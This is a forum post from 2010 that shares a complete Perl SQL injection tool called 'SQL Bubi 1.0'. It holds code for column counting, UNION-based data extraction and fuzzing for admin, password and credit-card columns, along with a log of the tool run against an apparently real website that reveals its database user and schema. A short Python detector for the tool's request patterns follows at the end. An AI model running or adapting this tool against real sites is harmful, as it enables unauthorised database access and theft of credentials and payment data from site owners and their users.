
Topic: SQL Bubi 1.0


  1. #1 SQL Bubi 1.0

    I'm sharing a somewhat older project of mine here. Since various SQL injection helpers didn't run particularly well for me, quite apart from Linux, I wrote something of my own for it.

    It's nothing special, just helpful and not as fucked up as schemafuzz.
    The functions can be found in the comments.

    Bubi is written in Perl
    Total lines -> um, 310
    On request I'll build in proxy and thread support

    Log files are generated automatically and should contain all the important information. I'm open to criticism and code improvements

    Intro

```perl
#!/usr/bin/perl
#-------------------------------------------------------------------#
#    _  ___  _    ____  
#   (_)/ _ \| |  |___ \ 
#    _| | | | | __ __) |
#   | | | | | |/ /|__ < 
#   | | |_| |   < ___) |
#   | |\___/|_|\_\____/
#  _/ |                 
# |__/  SQL Injection Helper 1.0 
#
#................................................................
#
#    + written by fred777
#    + (C) 2010 by j0k3 project
#    + fred777.5x.to
#
# ...............................................................
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
#                    j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sql.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# ...............................................................
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course
#
#-------------------------------------------------------------------#
```
    Logfile - Example:

```text
+-------------------------------------------------------------+
|    j0k3 SQL Injection Helper - Logfile                      |
+-------------------------------------------------------------+

Columns:8
String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8--+

+-------------------------------------------------------------+
|    j0k3 SQL Injection Helper - Logfile                      |
+-------------------------------------------------------------+

Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,j0k3

User: leeger_zuckerm@localhost
MySQL Version: 5.0.90-community
Directory: /var/lib/mysql/

+-------------------------------------------------------------+
|    j0k3 SQL Injection Helper - Logfile                      |
+-------------------------------------------------------------+

Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_name,99999)))+from+information_schema.columns

Dumping Information:

[0] CHARACTER_SETS:CHARACTER_SET_NAME
[1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
[2] CHARACTER_SETS:DESCRIPTION
[3] CHARACTER_SETS:MAXLEN
[4] COLLATIONS:COLLATION_NAME
[5] COLLATIONS:CHARACTER_SET_NAME
[6] COLLATIONS:ID
[7] COLLATIONS:IS_DEFAULT
[8] COLLATIONS:IS_COMPILED
[9] COLLATIONS:SORTLEN
[10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NAME
[11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SET_NAME
[12] COLUMNS:TABLE_CATALOG
[13] COLUMNS:TABLE_SCHEMA
[14] COLUMNS:TABLE_NAME

+-------------------------------------------------------------+
|    j0k3 SQL Injection Helper - Logfile                      |
+-------------------------------------------------------------+

Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7,j0k3

Scanning Tables:
+ information_schema.columns -> Scanning Columns:
- table_name
- column_name
```
    Script:

```perl
#!/usr/bin/perl
#-------------------------------------------------------------------#
#    _  ___  _    ____  
#   (_)/ _ \| |  |___ \ 
#    _| | | | | __ __) |
#   | | | | | |/ /|__ < 
#   | | |_| |   < ___) |
#   | |\___/|_|\_\____/
#  _/ |                 
# |__/  SQL Injection Helper 1.0 
#
#................................................................
#
#    + written by fred777
#    + (C) 2010 by j0k3 project
#    + fred777.5x.to
#
# ...............................................................
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
#                    j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sql.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# ...............................................................
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;

print q{
+-------------------------------------------------------------+
|                 SQL Injection Helper 1.0                    |
|                                                             |
|    + Column Counter                                         |
|    + SQL Data Grabber                                       |
|    + Name Information-Fuzzer                                |
|                                                             |
|                         < j0k3 >           (C) by fred777   |
+-------------------------------------------------------------+
}; $|++;

our ($op,$url,$true) = @ARGV;           # mode, target url, true-word (for -c)
our ($file,$lim)     = ('log.txt',1000); # logfile name, LIMIT step for -d
our $ua              = LWP::UserAgent->new();

my $head =
"+-------------------------------------------------------------+\n".
"|    j0k3 SQL Injection Helper - Logfile                      |\n".
"+-------------------------------------------------------------+\n";

# show usage instead of "uninitialized value" warnings when arguments are missing
usage() unless defined $op  && $op  =~ m:^-d$|^-c$|^-f$:i;
usage() unless defined $url && $url =~ m{^http://};

writing($head);

order()   if($op eq '-c');
selects() if($op eq '-d');
fuzz()    if($op eq '-f');


# -c: Column Counter
sub order {

    error() if(!$true);
    my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1");

    do {
        $i++;
        $resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n";
    }   while($resp->content =~ m:$true:i);

    $str .= ",$_" for (2..$i-1);
    printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+");
    writing("\nColumns:".($i-1)."\nString: $str--+\n\n");

}

# -d: SQL Data Grabber
sub selects {

    if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) {

        my $inf  =  'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))';
        my $st   =  replace($url,'j0k3',$inf);
        my $resp =  $ua->get("$st--+") or die "\n$!\n";

        $resp->content    =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i;
        my $t    =  "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
        print $t;   writing($t);

    }

    elsif($url =~ m:.+from.+:i) {

        my ($c,$resp) = (0,0);
        $url    =~ m:j0k3\((.+)\):i;
        my $str =  "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))";
        my $st  =  replace($url,'j0k3\('.$1.'\)',$str);
        print      "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");

        do {
            $resp  =  $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n";
            $resp->content =~ m![9]{5}:(.*):[9]{5}!;
            print  "[$c] $1\n"; writing("[$c] $1\n");
            $c++;
        } while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i);
    }

    else {
        error();
    }
}

# -f: Name Information Fuzzer
sub fuzz {

    my @tables =(
    'user','admin','users','admins','account','accounts','adm','admin_login', 
    'member','memberlist','members','login_admin','login_admins','login_user',
    'login_users','logins','logon','logs','admin_user','admin_userinfo','administer',
    'administrable','administrate','administration','administrator','administrators',
    'adminrights','adminuser','login','mambo_session','mambo_users','manage','Logins',
    'manager','mb_users','mybb_users','e107.e107_user','e107_user','Admins','Login',
    'phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users',
    'tbladmins','sort','_wfspro_admin','4images_users','a_admin','art','article_admin', 
    'articles','artikel','aut','author','autore','backend','backend_users','backenduser', 
    'chat_config','chat_messages','chat_users','client','clients','clubconfig',
    'company','config','contact','contacts','content', 'control','cpg_config', 
    'cpg132_users','customer','customers','customers_basket','dbadmins','dealer', 
    'dealers','diary','download','forum.ibf_members','fusion_user_groups',
    'fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings',
    'ibf_members','ibf_members_converge','ibf_sessions','icq','images','index',
    'info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users',
    'jos_comprofiler_members','jos_contact_details','jos_joomblog_users',
    'jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici',
    'kpro_adminlogs','kpro_user','links','lost_pass','lost_passwords','movie','movies',
    'lostpass','lostpasswords','m_admin','main','minibbtable_users','mitglieder',
    'mysql','mysql.user','name','names','news','news_lostpass','newsletter', 
    'nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users',
    'obb_profiles','order','orders','parol','partner','partners','passes','password',
    'passwords','perdorues','perdoruesit','phorum_session','phorum_user',
    'phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user',
    'punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers', 
    'session','sessions','settings','shop.cards','shop.orders','site_login', 
    'site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members',
    'SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser', 
    'sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member',
    'tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user',
    'tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test',
    'usebb_members','user_admin','user_info','user_list','user_login','user_logins',
    'user_names','usercontrol','userinfo','userlist','userlogins','username','usernames',
    'userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members',
    'webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin',
    'xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ActiveDataFeed',
    'Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1',
    'DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties', 
    'Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre', 
    'JamPass','MyTicketek','MyTicketekArchive','News','Promotion','Region',
    'SearchOptions','Series','Sheldonshows','StateList','States','SubCategory',
    'Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent', 
    'sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows',
    'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
    'uvw_Category','uvw_Preferences','Venue','venues','VenuesNew','stone list',
    'tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor',
    'tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory',
    'tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList', 
    'viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info', 
    'CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name',
    'jos_user','table_user','email','mail','bulletin','cc_info','login_name', 
    'admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin', 
    );

    my @columns = (
    'user','name','username','password','passwd','pass','benutzername','passwort',
    'cc_number','id','email','pwd','user_name','customers_email_address',
    'customers_password','user_password','user_pass','admin_user','admin_password',
    'admin_pass','usern','user_n','username1','password1','email1','id1',
    'users','login','logins','login_user','login_admin','login_username','user_username', 
    'user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid',
    'admin_userid','adminusername','admin_username','adminname','admin_name',
    'usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid',
    'userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user',
    'wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria', 
    'kodi','emer','ime','korisnik','korisnici','user1','administrator','text',
    'administrator_name','mem_login','login_password','login_pass','login_passwd',
    'login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w',
    'user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin',
    'user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password', 
    'memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass', 
    'mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username',
    'my_name','my_password','my_email','cvvnumber','about','access','accnt',
    'accnts','account','accounts','admin','adminemail','adminlogin','adminmail',
    'admins','aid','aim','auth','authenticate','authentication','blog','cc_expires',
    'cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername',
    'conf','config','contact','converge_pass_hash','converge_pass_salt','crack', 
    'customer','customers','cvvnumber]','data','db_database_name','db_hostname', 
    'db_password','db_username','download','e-mail','emailaddress','full','gid',
    'group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group',
    'id_member','images','index','ip_address','last_ip','last_login','lastname',
    'log','login_name','login_pw','loginkey','loginout','logo','md5hash','member', 
    'member_id','member_login_key','member_name','memberid','membername','members',
    'new','news','nick','number','nummer','pass_hash','passwordsalt','passwort', 
    'personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer',
    'secretquestion','serial','session_member_id','session_member_login_key','sesskey', 
    'setting','sid','spacer','status','store','store1','store2','store3','store4',
    'table_prefix','temp_pass','temp_password','temppass','temppasword','text','un',
    'user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword',
    'user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm', 
    'userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name',
    'xar_pass');

    print "\nUrl: $url\n"; writing("\nUrl: $url\n");
    print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");

    foreach my $tab (@tables) {

        my $re   = replace($url,'j0k3',9x5);
        my $resp = $ua->get("$re+FROM+$tab--+");

        if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) {
            print "+ $tab -> Scanning Columns:\n";
            writing("+ $tab -> Scanning Columns:\n");

            foreach my $col (@columns) {
                $re   = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
                $resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+");

                if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
                    print "- $col\n"; writing("- $col\n");
                }
            }
        }

    }

}

# replace the first match of pattern $or in $str with $re
sub replace {

    my ($str,$or,$re) = @_;
    $str =~ s/$or/$re/;
    return $str;

}

# append $text to the logfile
sub writing {

    my $text = shift;
    open  FL,">>$file" or die "\n$!\n";
    print FL $text;
    close FL;

}

sub error {

    print "+-------------------------------------------------------------+\n".
          "|    Error:  Read Usage! - \$ perl sql.pl                      |\n".
          "+-------------------------------------------------------------+\n"; exit;

}

sub usage {

print q{
+-------------------------------------------------------------+
|   INFORMATION                                               |
+-------------------------------------------------------------+
|                                                             |
|   Column Counter:                                           |
|   $ perl sql.pl -c <url> <true-word>                        |
|   $ perl sql.pl -c http://seite.de/?id=7 j0k3               |
|                                                             |
|   SQL Data Grabber:                                         |
|   $ perl sql.pl -d <url>                                    |
|   $ perl sql.pl -d http://seite.de/?id=-7+union+select      |
|                    +1,j0k3                                  |
|   $ perl sql.pl -d http://seite.de/?id=-7+union+select+1,   |
|                    j0k3(column1,column2)+from+table         |
|                                                             |
|   Name Information Fuzzer:                                  |
|   $ perl sql.pl -f <url>                                    |
|   $ perl sql.pl -f http://seite.de/?id=-7+union+select      |
|                   +1,j0k3                                   |
|                                                             |
|                        < j0k3 >                             |
+-------------------------------------------------------------+
}; exit;
}
# EOF - < j0k3 > - > 06.2010 - version 1.0
```
    Last edited by fred777 (13.06.2010 at 22:37)
    _n0p3_

  2. The following users thanked this post:

    moppelito (13.06.2010)
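For the defender's side of this thread, an added example that is not part of the original post and not the helper's own code: a small Python detector that parses web-server access-log lines and flags the request shapes the script above produces (the consecutive `ORDER BY n--+` walk of the column counter, `AND 1=0 UNION SELECT`, the `99999` delimiter wrapped around results, the `information_schema.columns` dump and the `,99999 FROM <table>--+` table guesses). The Apache combined log format, the sample lines and the IP addresses are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines modelled on the requests the helper sends
# in -c, -d and -f mode; hosts and IPs are documentation ranges, not real targets.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jun/2010:22:01:01 +0200] "GET /index.php?id=18+ORDER+BY+1--+ HTTP/1.1" 200 5120 "-" "libwww-perl/5.834"
203.0.113.7 - - [13/Jun/2010:22:01:02 +0200] "GET /index.php?id=18+ORDER+BY+2--+ HTTP/1.1" 200 5120 "-" "libwww-perl/5.834"
203.0.113.7 - - [13/Jun/2010:22:01:03 +0200] "GET /index.php?id=18+ORDER+BY+3--+ HTTP/1.1" 200 612 "-" "libwww-perl/5.834"
203.0.113.7 - - [13/Jun/2010:22:01:05 +0200] "GET /index.php?id=18+AND+1=0+UNION+SELECT+1,UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))--+ HTTP/1.1" 200 700 "-" "libwww-perl/5.834"
203.0.113.7 - - [13/Jun/2010:22:01:06 +0200] "GET /index.php?id=18+and+1=0+union+select+1,99999+FROM+users--+ HTTP/1.1" 200 700 "-" "libwww-perl/5.834"
198.51.100.4 - - [13/Jun/2010:22:02:00 +0200] "GET /index.php?id=18 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) ')  # client IP and request path

# Fingerprints taken from the requests the script builds: sequential ORDER BY probes,
# "AND 1=0 UNION SELECT", the 99999 delimiter, the schema dump and the table guesses.
SIGNATURES = {
    "order_by_probe":  re.compile(r"\bORDER\s+BY\s+(\d+)\s*--", re.I),
    "union_select":    re.compile(r"\bAND\s+1=0\s+UNION\s+SELECT\b", re.I),
    "99999_delimiter": re.compile(r"CONCAT(?:_WS)?\((?:0x3a,)?99999", re.I),
    "schema_dump":     re.compile(r"information_schema\.columns", re.I),
    "table_guess":     re.compile(r",99999\s+FROM\s+[\w.]+\s*--", re.I),
}

def parse_line(line):
    """Return (ip, decoded_path) or None; '+' decodes to a space, as the SQL engine saw it."""
    m = LOG_RE.match(line)
    return (m.group(1), unquote_plus(m.group(2))) if m else None

def classify(decoded_path):
    """Names of every signature that matches one decoded request path."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_path)]

def analyse(log_text):
    """Per client IP: hit counts per signature and the ORDER BY values probed, in order."""
    per_ip = defaultdict(lambda: {"hits": defaultdict(int), "order_by": []})
    for parsed in filter(None, map(parse_line, log_text.splitlines())):
        ip, path = parsed
        for name in classify(path):
            per_ip[ip]["hits"][name] += 1
            if name == "order_by_probe":
                per_ip[ip]["order_by"].append(int(SIGNATURES[name].search(path).group(1)))
    return per_ip

def is_column_counter(order_by_seq, min_len=3):
    """True for a run 1,2,3,... of ORDER BY probes: the walk the -c mode performs."""
    return len(order_by_seq) >= min_len and order_by_seq == list(range(1, len(order_by_seq) + 1))

def report(log_text):
    """Summary per IP: which signatures fired and whether a column-count walk was seen."""
    return {ip: {"signatures": sorted(d["hits"]), "column_counter": is_column_counter(d["order_by"])}
            for ip, d in analyse(log_text).items()}

if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

Only IPs with at least one signature hit appear in the report, so the ordinary `id=18` request from the second client is not listed.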
